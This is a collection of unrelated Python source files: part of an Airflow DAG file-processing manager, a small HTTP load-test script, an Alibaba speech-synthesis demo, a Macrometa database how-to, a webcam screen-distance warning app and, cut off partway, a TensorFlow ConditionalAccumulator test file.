file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
# Stop creating duplicate processor i.e. processor with the same filepath
if file_path in self._processors.keys():
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._create_process(
file_path, self._pickle_dags, self._dag_ids, callback_to_execute_for_file
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
# Sort the file paths by the parsing order mode
list_mode = conf.get("scheduler", "file_parsing_sort_mode")
files_with_mtime = {}
file_paths = []
is_mtime_mode = list_mode == "modified_time"
file_paths_recently_processed = []
for file_path in self._file_paths:
if is_mtime_mode:
try:
files_with_mtime[file_path] = os.path.getmtime(file_path)
except FileNotFoundError:
self.log.warning("Skipping processing of missing file: %s", file_path)
continue
file_modified_time = timezone.make_aware(datetime.fromtimestamp(files_with_mtime[file_path]))
else:
file_paths.append(file_path)
file_modified_time = None
# Find file paths that were recently processed to exclude them
# from being added to file_path_queue
# unless they were modified recently and parsing mode is "modified_time"
# in which case we don't honor "self._file_process_interval" (min_file_process_interval)
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
and not (is_mtime_mode and file_modified_time and (file_modified_time > last_finish_time))
):
file_paths_recently_processed.append(file_path)
# Sort file paths via last modified time
if is_mtime_mode:
file_paths = sorted(files_with_mtime, key=files_with_mtime.get, reverse=True)
elif list_mode == "alphabetical":
file_paths = sorted(file_paths)
elif list_mode == "random_seeded_by_host":
# Shuffle the list seeded by hostname so multiple schedulers can work on different
# set of files. Since we set the seed, the sort order will remain same per host
random.Random(get_hostname()).shuffle(file_paths)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
file_paths_to_exclude = set(file_paths_in_progress).union(
file_paths_recently_processed, files_paths_at_run_limit
)
# Do not convert the following list to set as set does not preserve the order
# and we need to maintain the order of file_paths for `[scheduler] file_parsing_sort_mode`
files_paths_to_queue = [
file_path for file_path in file_paths if file_path not in file_paths_to_exclude
]
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
processors_to_remove = []
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
# Clean up processor references
self.waitables.pop(processor.waitable_handle)
processors_to_remove.append(file_path)
# Clean up `self._processors` after iterating over it
for proc in processors_to_remove:
self._processors.pop(proc)
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
@property
def file_paths(self):
return self._file_paths
|
simulate-alert.py
|
import sys
import requests
import threading
######################################################################################
# Run the load-tests on the endpoint #
######################################################################################
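# Example invocation (values are placeholders): fire the configured number of concurrent
# GET requests at a NodePort service that exposes /api/users, e.g.
#
#   python simulate-alert.py 192.168.49.2 30080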
def load_test(port, test_hostname):
try:
endpoint='/api/users'
http_req = "http://" + test_hostname + ":" + str(port) + endpoint
print(http_req)
rsp = requests.get(http_req)
        if rsp.status_code != 200:
            print("Request to /api/users failed with status code " + str(rsp.status_code))
except Exception as e:
print ("Encountered exception while running load-test", e)
######################################################################################
# Create load-test #
######################################################################################
if __name__=="__main__":
try:
#Configure the number of requests you want to execute on your endpoint
no_of_requests = 1000
        if len(sys.argv) < 3:
            print("Please pass two arguments - the IP followed by the NodePort where the application is running..")
            exit(1)
        # test_hostname is where your application is hosted
hostIP = sys.argv[1]
#Node Port where the application is reachable
port = sys.argv[2]
#Schedule the threads
for i in range(no_of_requests):
request = threading.Thread(target=load_test, args=(port, hostIP))
request.start()
except Exception as e:
print ("Encountered exceptoin while running load-test", e)
finally:
print ("Load test executed succesfully..")
|
speech_synthesizer_demo.py
|
# -*- coding: utf-8 -*-
"""
* Copyright 2015 Alibaba Group Holding Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
import threading
import ali_speech
from ali_speech.callbacks import SpeechSynthesizerCallback
from ali_speech.constant import TTSFormat
from ali_speech.constant import TTSSampleRate
class MyCallback(SpeechSynthesizerCallback):
    # The name parameter specifies the file used to save the audio
def __init__(self, name):
self._name = name
self._fout = open(name, 'wb')
def on_meta_info(self, message):
print(message)
def on_binary_data_received(self, raw):
print('MyCallback.on_binary_data_received: %s' % len(raw))
self._fout.write(raw)
def on_completed(self, message):
print('MyCallback.OnRecognitionCompleted: %s' % message)
self._fout.close()
def on_task_failed(self, message):
print('MyCallback.OnRecognitionTaskFailed-task_id:%s, status_text:%s' % (
message['header']['task_id'], message['header']['status_text']))
self._fout.close()
def on_channel_closed(self):
print('MyCallback.OnRecognitionChannelClosed')
def process(client, appkey, token, text, audio_name):
callback = MyCallback(audio_name)
synthesizer = client.create_synthesizer(callback)
synthesizer.set_appkey(appkey)
synthesizer.set_token(token)
synthesizer.set_voice('xiaoyun')
synthesizer.set_text(text)
synthesizer.set_format(TTSFormat.WAV)
synthesizer.set_sample_rate(TTSSampleRate.SAMPLE_RATE_16K)
synthesizer.set_volume(50)
synthesizer.set_speech_rate(0)
synthesizer.set_pitch_rate(0)
try:
ret = synthesizer.start()
if ret < 0:
return ret
synthesizer.wait_completed()
except Exception as e:
print(e)
finally:
synthesizer.close()
def process_multithread(client, appkey, token, number):
thread_list = []
for i in range(0, number):
text = "这是线程" + str(i) + "的合成。"
audio_name = "sy_audio_" + str(i) + ".wav"
thread = threading.Thread(target=process, args=(client, appkey, token, text, audio_name))
thread_list.append(thread)
thread.start()
for thread in thread_list:
thread.join()
if __name__ == "__main__":
client = ali_speech.NlsClient()
    # Set the log level: DEBUG, INFO, WARNING, ERROR
client.set_log_level('INFO')
    appkey = 'your-appkey'
    token = 'your-token'
text = "今天是周一,天气挺好的。"
audio_name = 'sy_audio.wav'
process(client, appkey, token, text, audio_name)
    # Multithreading example
# process_multithread(client, appkey, token, 10)
|
HowTo-UsingRealTimeGeoDistributedDatabase.py
|
from c8 import C8Client
import random
import threading
import time
# Variables
service_url = "gdn1.macrometa.io" # The request will be automatically routed to closest location.
user_mail = "user@example.com"
user_password = "hidden"
geo_fabric = "testfabric"
collection_name = "employees" + str(random.randint(1, 10000))
def create_callback():
def callback_fn(event):
print("received... document:{}".format(event))
return
fabric.on_change(collection_name, callback=callback_fn)
if __name__ == '__main__':
print("\n ------- CONNECTION SETUP ------")
print("user: {}, geofabric:{}".format(user_mail, geo_fabric))
client = C8Client(protocol='https', host=service_url, port=443) # Automatically routed to nearest region.
tenant = client.tenant(user_mail, user_password)
fabric = tenant.useFabric(geo_fabric)
print("Availabile regions....")
dclist = fabric.dclist(detail=True)
for dc in dclist:
print(" region: {}".format(dc["name"]))
print("Connected to closest region...\tregion: {}".format(fabric.localdc(detail=False)))
print("\n ------- CREATE GEO-REPLICATED COLLECTION ------")
employees = fabric.create_collection(collection_name)
print("Created collection: {}".format(collection_name))
time.sleep(2) # to account for network latencies in replication
print("\n ------- SUBSCRIBE TO CHANGES ------")
# Receive documents from the collection in realtime... PUSH Model
rt_thread = threading.Thread(target=create_callback)
rt_thread.start()
time.sleep(2)
print("Callback registered for collection: {}".format(collection_name))
print("\n ------- INSERT DOCUMENTS ------")
print("Inserting 3 documents to the collection...")
employees.insert({'_key':'John', 'firstname': 'John', 'lastname':'Wayne', 'email':'john.wayne@macrometa.io'})
employees.insert({'_key':'Clark', 'firstname': 'Clark', 'lastname':'Kent', 'email':'clark.kent@macrometa.io'})
employees.insert({'_key': 'Bruce', 'firstname': 'Bruce', 'lastname':'Wayne', 'email':'bruce.wayne@macrometa.io'})
print("Wait to close the callback...")
rt_thread.join()
print("\n ------- DONE ------")
|
GoodEyes.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 26 12:14:08 2022
@author: nuria
#todo
- change so that it does not pop up two times if I am already away (maybe sleep for 1sec? lets try)
"""
from __future__ import print_function
from threading import Thread
import pygame
import datetime
import time
import os
import json
import cv2 as cv
import argparse
import ctypes  # A standard library module included with the Python install.
pygame_title = "GoodEyes"
pygame_icon_png = "eye.png"
stream = cv.VideoCapture(0, cv.CAP_DSHOW)
pygame.init()
screen_width, screen_height = 500, 500
screen = pygame.display.set_mode((screen_width, screen_height))
clock = pygame.time.Clock()
font_title = pygame.font.SysFont("Segoe UI", 40, bold = True)
font_30 = pygame.font.SysFont("calibri", 30)
font_24 = pygame.font.SysFont("calibri", 24)
font_18 = pygame.font.SysFont("calibri", 18)
font_16 = pygame.font.SysFont("calibri", 16)
font_14 = pygame.font.SysFont("calibri", 16)
filepath = os.path.dirname(__file__)
pygame.display.set_caption(pygame_title)
programIcon = pygame.image.load(os.path.join(filepath,pygame_icon_png))
pygame.display.set_icon(programIcon)
class button():
def __init__(self, color, x,y,width,height, text='', font=font_30):
self.color = color
self.x = x
self.y = y
self.width = width
self.height = height
self.text = text
self.font = font
def draw(self,screen):
#Call this method to draw the button on the screen
pygame.draw.rect(screen, self.color, (self.x,self.y,self.width,self.height),0,5)
if self.text != '':
text = self.font.render(self.text, 1, (255,255,255))
screen.blit(text, (self.x + (self.width/2 - text.get_width()/2), self.y + (self.height/2 - text.get_height()/2)))
def isOver(self, pos):
#Pos is the mouse position or a tuple of (x,y) coordinates
if pos[0] > self.x and pos[0] < self.x + self.width:
if pos[1] > self.y and pos[1] < self.y + self.height:
return True
return False
def change_button_color(button_key, pos, default_color=(0,0,0), isOver_color=(0,0,255)):
if button_key.isOver(pos):
button_key.color = isOver_color
else:
button_key.color = default_color
button_key.draw(screen)
pygame.display.update()
def detectWidth(frame):
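    # Detect faces and eyes with Haar cascades, draw them on the preview window, and return the
    # width of the (last) detected face bounding box in pixels, which the main loop uses as a
    # rough proxy for distance to the screen.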
frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
frame_gray = cv.equalizeHist(frame_gray)
faces = face_cascade.detectMultiScale(frame_gray,1.3,5)
width = 0
for (x, y, w, h) in faces:
center = (x + w // 2, y + h // 2)
frame = cv.ellipse(frame, center, (w // 2, h // 2), 0, 0, 360, (255, 0, 255), 4)
faceROI = frame_gray[y:y + h, x:x + w]
# -- In each face, detect eyes
eyes = eyes_cascade.detectMultiScale(faceROI)
for (x2, y2, w2, h2) in eyes:
eye_center = (x + x2 + w2 // 2, y + y2 + h2 // 2)
radius = int(round((w2 + h2) * 0.25))
frame = cv.circle(frame, eye_center, radius, (255, 0, 0), 4)
width = w
cv.imshow('Capture - Face detection', frame)
return width
def Mbox(title, text, style):
return ctypes.windll.user32.MessageBoxW(0, text, title, style)
def write_json(totalAlertTime, totalTime, num_popups):
HOUR = datetime.datetime.now().hour
MINUTE = datetime.datetime.now().minute
with open(os.path.join(filepath,"dict.json"),"r") as json_file:
json_dictionary = json.load(json_file)
with open(os.path.join(filepath,"dict.json"),"w") as json_file:
json_dictionary["h_{}_m_{}".format(HOUR,MINUTE)] = {}
json_dictionary["h_{}_m_{}".format(HOUR,MINUTE)]["AlertTime"] = round(totalAlertTime/totalTime*100, 1)
json_dictionary["h_{}_m_{}".format(HOUR,MINUTE)]["num_popups"] = round(num_popups/totalTime*60, 1)
json.dump(json_dictionary, json_file)
def draw_graph (x,y,width,height,x_lst,y_lsts):
colors = ((0,0,150),(0,150,0),(150,0,0))
pygame.draw.line(screen, (0,0,0),(x,y+height),(x+width, y+height))
pygame.draw.line(screen, (0,0,0), (x,y),(x,y+height))
max_x = float(max(x_lst))
for index, y_lst in enumerate(y_lsts):
max_y = float(max(y_lst))
prev_y_pos = 0
prev_x_pos = 0
color = colors[index]
for index, val in enumerate(y_lst):
i=index
y_pos = int(y+height-val/max_y*height)
x_pos = int(x+i/max_x*width)
pygame.draw.circle(screen, color,(x_pos,y_pos), 1)
if index >0:
pygame.draw.line(screen, color, (prev_x_pos, prev_y_pos),(x_pos,y_pos), )
prev_y_pos = y_pos
prev_x_pos = x_pos
def give_averages():
with open(os.path.join(filepath,"dict.json"),"r") as json_file:
json_dictionary = json.load(json_file)
alerttime_list = []
num_popups_list = []
hours_list = []
previous_hour = None
for index, sth in enumerate(json_dictionary):
next_hour = sth.split("_")[1]
if next_hour != previous_hour:
alerttime_list.append([])
num_popups_list.append([])
hours_list.append(next_hour)
alerttime_list[-1].append(json_dictionary[sth]["AlertTime"])
num_popups_list[-1].append(json_dictionary[sth]["num_popups"])
previous_hour = next_hour
width = 20
height = 270
write_message("week", rectangle=(width, height), font=font_16)
write_message("% time being", rectangle=(width, height+25), font=font_16)
write_message("too close", rectangle=(width, height+40), font=font_16)
write_message("avg alerts/min", rectangle=(width, height+70), font=font_16)
width +=150
y_lst = [[],[]]
for index, hours in enumerate(hours_list):
alert = sum(alerttime_list[index])/len(alerttime_list[index])
popups = sum(num_popups_list[index])/len(num_popups_list[index])
y_lst[0].append(alert)
y_lst[1].append(popups)
write_message(str(hours), rectangle=(width, height), centered=True, font=font_16)
write_message("{:.0f}".format(alert), rectangle=(width, height+37), centered=True, font=font_14)
write_message("{:.1f}".format(popups), rectangle=(width, height+70), centered=True, font=font_14)
width += 40
write_message("alert time", rectangle=(55,430), font=font_16, color=(0,0,150))
write_message("popups", rectangle=(55,450), font=font_16, color=(0,150,0))
draw_graph(50,370,400,100,hours_list, y_lst)
def draw_Initial_Screen():
ini=170
sp=20
screen.fill((255,255,255))
write_message("G", rectangle=(ini, 20), font=font_title, color=(148,0,211))
write_message("o", rectangle=(ini+sp, 20), font=font_title, color=(75,0,130))
write_message("o", rectangle=(ini+sp*2, 20), font=font_title, color=(75, 0, 130))
write_message("d", rectangle=(ini+sp*3, 20), font=font_title, color=(0, 0, 255))
write_message("E", rectangle=(ini+sp*4, 20), font=font_title, color=(0, 255, 0))
write_message("y", rectangle=(ini+sp*5, 20), font=font_title, color=(220, 220, 0))
write_message("e", rectangle=(ini+sp*6, 20), font=font_title, color=(255, 127, 0))
write_message("s", rectangle=(ini+sp*7, 20), font=font_title, color=(255, 0 , 0))
#write_message("GoodEyes", rectangle=(screen_width/2, 20), centered=True, font=font_title)
write_message("Welcome to GoodEyes!", rectangle=(screen_width/2, 95), centered=True, font=font_16)
write_message("You will be warned if you are too close to the screen", rectangle=(screen_width/2, 120), centered=True, font=font_16)
write_message("Press the button to start tracking!", rectangle=(screen_width/2, 140), centered=True, font=font_16)
give_averages()
button_off = button((255,0,0),220,180,50,50,text="OFF")
button_off.draw(screen)
pygame.display.update()
return(button_off)
# (draw_Initial_Screen() is called further below, once write_message and change_button_colors
#  are defined; calling it here would fail with a NameError.)
def write_message(message, color = (0,0,0), rectangle=[0,0], font=font_18, update = True, centered = False):
mesg = font.render(message, True, color)
if centered:
w,h = rectangle
rectangle = [w-mesg.get_width()/2,h]
screen.blit(mesg, rectangle)
if update:
pygame.display.update()
def change_button_colors(button_off):
Open = True
for event in pygame.event.get():
if event.type == pygame.MOUSEBUTTONDOWN:
if button_off.color == (100,0,0):
button_off = button((0,255,0),220,180,50,50,text="ON")
button_off.draw(screen)
if button_off.color == (0,100,0):
button_off = button((255,0,0),220,180,50,50,text="OFF")
button_off.draw(screen)
Open = False
if event.type == pygame.MOUSEMOTION:
pos = pygame.mouse.get_pos()
if button_off.isOver(pos):
if button_off.color == (255,0,0):
button_off = button((100,0,0),220,180,50,50,text="OFF")
button_off.draw(screen)
elif button_off.color == (0,255,0):
button_off = button((0,100,0),220,180,50,50,text="ON")
button_off.draw(screen)
else:
if button_off.color == (100,0,0):
button_off = button((255,0,0),220,180,50,50,text="OFF")
button_off.draw(screen)
elif button_off.color == (0,100,0):
button_off = button((0,255,0),220,180,50,50,text="ON")
button_off.draw(screen)
if event.type == pygame.QUIT:
Open = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
Open = False
if event.key == pygame.K_q:
Open = False
pygame.display.update()
return(Open, button_off)
parser = argparse.ArgumentParser(description='Code for Cascade Classifier tutorial.')
parser.add_argument('--face_cascade', help='Path to face cascade.', default= cv.data.haarcascades + 'haarcascade_frontalface_default.xml')
parser.add_argument('--eyes_cascade', help='Path to eyes cascade.', default= cv.data.haarcascades + 'haarcascade_eye.xml')
parser.add_argument('--camera', help='Camera device number.', type=int, default=0)
args = parser.parse_args()
face_cascade_name = args.face_cascade
eyes_cascade_name = args.eyes_cascade
face_cascade = cv.CascadeClassifier()
eyes_cascade = cv.CascadeClassifier()
if not face_cascade.load(cv.samples.findFile(face_cascade_name)):
print('--(!)Error loading face cascade')
exit(0)
if not eyes_cascade.load(cv.samples.findFile(eyes_cascade_name)):
print('--(!)Error loading eyes cascade')
exit(0)
camera_device = args.camera
# Shared GUI state: the background thread below keeps these globals updated while the main
# detection loop further down reads them.
Open = True
button_off = draw_Initial_Screen()
def updateGUI():
    global Open, button_off
    clock.tick(60)
    while True:
        Open, button_off = change_button_colors(button_off)
        if button_off.color == (0,255,0) or Open==False:
            break
Thread(target=updateGUI, args=()).start()
start = time.time()
timeLast = start
alertTimeLimit = 5 #seconds. Change this variable with the interface code
alertTime = 0
totalAlertTime = 0
distance_list=[]
num_popups = 0
already_seen = False
while Open:
Open, button_off = change_button_colors(button_off)
timeNow = time.time()
ret, frame = stream.read()
width = detectWidth(frame)
distance_list.append(width)
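    # Heuristic: a face box wider than ~220 px is treated as "too close"; the threshold depends
    # on the webcam resolution and field of view.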
if width > 220:
print(timeNow - timeLast)
alertTime = timeNow - timeLast
        #This line creates the popup after a period of time has passed where the face is too close to the screen
if(timeNow - timeLast > alertTimeLimit):
if already_seen:
already_seen = False
continue
else:
already_seen = True
MB_YESNO = 4
MB_TOPMOST = 0x40000
uType = 0 | MB_TOPMOST
Mbox('Get away!', 'You are too close to the screen', uType)
num_popups +=1
else:
totalAlertTime += alertTime
alertTime = 0
screen.fill((255,255,255), (20,200,150,30))
write_message("total alert time: {:.1f}s".format(totalAlertTime), rectangle=[20,200])
        pygame.display.update()
        print("total alert time", totalAlertTime)
timeLast = timeNow
pygame.display.flip()
if (cv.waitKey(1) & 0xFF == ord('q')):
break
end = time.time()
totalTime = end - start
if totalTime > 0:
write_json(totalAlertTime, totalTime, num_popups)
stream.release()
cv.destroyAllWindows()
pygame.quit()
|
conditional_accumulator_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
# from functools import reduce
class ConditionalAccumulatorTest(tf.test.TestCase):
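  # A ConditionalAccumulator aggregates gradients and take_grad(n) returns their average once at
  # least n gradients have been applied; gradients whose local_step is older than the
  # accumulator's global_step are dropped (see the SetGlobalStep tests below).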
def testConstructor(self):
with tf.Graph().as_default():
q = tf.ConditionalAccumulator(tf.float32, name="Q")
self.assertTrue(isinstance(q.accumulator_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.accumulator_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'ConditionalAccumulator'
attr { key: 'dtype' value { type: DT_FLOAT } }
attr { key: 'shape' value { shape { unknown_rank: true} } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.accumulator_ref.op.node_def)
def testConstructorWithShape(self):
with tf.Graph().as_default():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1, 5, 2, 8]))
self.assertTrue(isinstance(q.accumulator_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.accumulator_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'ConditionalAccumulator'
attr { key: 'dtype' value { type: DT_FLOAT } }
attr { key: 'shape' value { shape { dim {size: 1 }
dim {size: 5 }
dim {size: 2 }
dim {size: 8 }
} } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.accumulator_ref.op.node_def)
def testAccumulatorSizeEmpty(self):
with self.test_session():
q = tf.ConditionalAccumulator(tf.float32, name="Q")
self.assertEqual(q.num_accumulated().eval(), 0)
def testAccumulatorSetGlobalStep(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
set_global_step_op = q.set_global_step(1)
set_global_step_op.run()
def testAccumulatorApplyGradFloat32(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
accum_op.run()
def testDtypes(self):
with self.test_session() as sess:
dtypes = [tf.float16, tf.float32, tf.float64]
for i in range(len(dtypes)):
dtype = dtypes[i]
q = tf.ConditionalAccumulator(dtype, shape=tf.TensorShape([1]))
elems = np.arange(10).astype(dtype.as_numpy_dtype)
for e in elems:
q.apply_grad((e,)).run()
result = sess.run(q.take_grad(1))
self.assertEqual(sum(elems) / len(elems), result)
def testAccumulatorMultipleAccumulators(self):
with self.test_session():
q_f32_0 = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
q_f32_1 = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
q_f16_0 = tf.ConditionalAccumulator(
tf.float16, name="Q", shape=tf.TensorShape([1]))
q_f16_1 = tf.ConditionalAccumulator(
tf.float16, name="Q", shape=tf.TensorShape([1]))
accums = [q_f16_0, q_f16_1, q_f32_0, q_f32_1]
for i in range(len(accums)):
accums[i].apply_grad((i + 10.0,)).run()
for i in range(len(accums)):
result = accums[i].take_grad(1).eval()
self.assertEqual(result, i + 10.0)
def testAccumulatorApplyAndTakeGradWithShape(self):
with self.test_session():
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=(3, 2))
elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
[[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
elems_ave = [[(a + b) / len(elems) for a, b in zip(x, y)]
for x, y in zip(elems[0], elems[1])]
accum_ops = [q.apply_grad(x) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
is_all_equal = True
val = takeg_t.eval()
for i in range(len(val)):
for j in range(len(val[i])):
is_all_equal &= (val[i][j] == elems_ave[i][j])
self.assertTrue(is_all_equal)
def testAccumulatorApplyGradWithWrongShape(self):
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=(3, 2))
with self.assertRaises(ValueError):
q.apply_grad([[1.0, 2.0], [3.0, 4.0]])
with self.assertRaises(ValueError):
q.apply_grad([[1.0], [2.0], [3.0]])
def testAccumulatorDynamicShape(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=None)
x = tf.placeholder(tf.float32)
accum_op = q.apply_grad(x)
elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
[[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
elems_ave = [[(a + b) / len(elems) for a, b in zip(c, d)]
for c, d in zip(elems[0], elems[1])]
takeg_t = q.take_grad(1)
for elem in elems:
sess.run(accum_op, feed_dict={x: elem})
is_all_equal = True
val = takeg_t.eval()
for i in range(len(val)):
for j in range(len(val[i])):
is_all_equal &= (val[i][j] == elems_ave[i][j])
self.assertTrue(is_all_equal)
def testAccumulatorWrongDynamicShape(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=None)
x = tf.placeholder(tf.float32)
accum_op = q.apply_grad(x)
# First successful apply_grad determines shape
sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]]})
with self.assertRaises(tf.errors.InvalidArgumentError):
sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0]]})
with self.assertRaises(tf.errors.InvalidArgumentError):
sess.run(accum_op, feed_dict={x: [[1.0], [2.0], [3.0]]})
def testAccumulatorSizeAfterApplyGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
self.assertEqual(q.num_accumulated().eval(), 0)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 1)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 2)
def testAccumulatorSizeAfterApplyGradAndTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
extract_t = q.take_grad(2)
# Applying gradient multiple times to increase size from 0 to 2.
self.assertEqual(q.num_accumulated().eval(), 0)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 1)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 2)
# Extract will reduce size to 0
extract_t.op.run()
self.assertEqual(q.num_accumulated().eval(), 0)
# Take gradients always sets the size back to 0 if successful.
accum_op = q.apply_grad((10.0,), local_step=1)
accum_op.run()
accum_op.run()
accum_op.run()
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 4)
extract_t.op.run()
self.assertEqual(q.num_accumulated().eval(), 0)
def testAccumulatorTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave, val)
accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
takeg_t = q.take_grad(tf.constant(1))
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave, val)
def testAccumulatorInvalidTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0]
accum_ops = [q.apply_grad((x,)) for x in elems]
takeg_t = q.take_grad(-1)
for accum_op in accum_ops:
accum_op.run()
with self.assertRaises(tf.errors.InvalidArgumentError):
takeg_t.eval()
def testAccumulatorRepeatedTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave, val)
elems = [20.0, 30.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave + 0.0, val)
def testAccumulatorIncrementGlobalStep(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
global_step = tf.Variable(0, name="global_step")
new_global_step = tf.add(global_step, 1)
inc_global_step = tf.assign(global_step, new_global_step)
set_global_step_op = q.set_global_step(new_global_step)
tf.initialize_all_variables().run()
for _ in range(3):
set_global_step_op.run()
inc_global_step.eval()
def testAccumulatorSetGlobalStepPreventsAccumulation(self):
with self.test_session():
q = tf.ConditionalAccumulator(
